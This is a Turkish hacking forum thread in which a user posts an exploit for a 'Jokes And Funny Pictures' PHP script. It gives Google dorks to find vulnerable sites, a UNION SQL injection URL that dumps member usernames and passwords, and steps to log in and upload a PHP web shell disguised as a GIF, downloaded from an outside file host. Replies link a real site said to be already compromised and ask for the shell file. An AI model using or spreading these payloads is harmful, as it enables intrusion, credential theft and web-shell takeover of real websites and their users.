folder Tahribat.com Forumları
linefolder Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
linefolder Jokes And Funny Pictures Script File Upload An Sql İnjectin Exploit

Jokes And Funny Pictures Script File Upload An Sql İnjectin Exploit

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Erkek

Açıcı bulan benim alıntı yapacak olan şerrolar alıntıdır yanına bulan kişidiyde yazsın.

google dork 1: inurl:index.php?sbjoke_id=

google dork 2: inurl:index.php?sbpic_id=

exploit: index.php?sbpic_id=-99+union+select+0,1,2,concat_ws(0x3a,sbuser_name,sbuser_pwd),4,5,6,7,8,9,10+from+sbjks_members/*

evet sadece sql injection ile sonuç alamayız bunun için oradaki username pass ile giriş yapın

giriş yaptıktan sonra : /submitpic.php Sayfasına gelip http://rapidshare.com/files/146837307/modaa.gif.php shell dosyasını upload edin resim olarak gözükücektir upload edilden sonra resme numarara vericekti sistem kendi 7440564modaa.gif.php gibi resmin yüklenicegi klasör  /uploadedpics/ klasörüdür binlerce sitede kullanılan bir scriptdir google bakın hadi hayırlı Heykıtlar :P

"Hayat zor olabilir ama ben de kolay sayılmam." insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    cuneyd
    cuneyd's avatar
    Erkek

http://www.joke4u.co.uk/index.php?sbjoke_id=98

hemen birileri heyklemiş :)

Siz cebit"e gidin Tayyip sizi yakalicak :B adama o kadar laf sölediniz,küfrettiniz :P sizi tahribat.com t-shirtleri ile yakalicak,böle kıcınıza kıcınıza sopaylan vuracak :B Tayyip sizi ağaca vurduracak :B sonra da cemil cicek"e vericek :B / yeah Cemil cicekkk :B
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Erkek
    heyk lerler affetmezler :) malw0rm e açık yollamıyorum artık bu açıklar public edilme nedeni tamamen kişisel ayrıca public etmedigim açıklarda var onlarıda zaman içinde paylaşırım.

"Hayat zor olabilir ama ben de kolay sayılmam." insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    karakas
    karakas's avatar
    Erkek

üstadım sizin modaa.gif shell i bize bir yere yollarsanız çok memnun kalırım verdiğiniz link eror diyor süresi bitmiş sanırım..

Toplam Hit: 1227 Toplam Mesaj: 4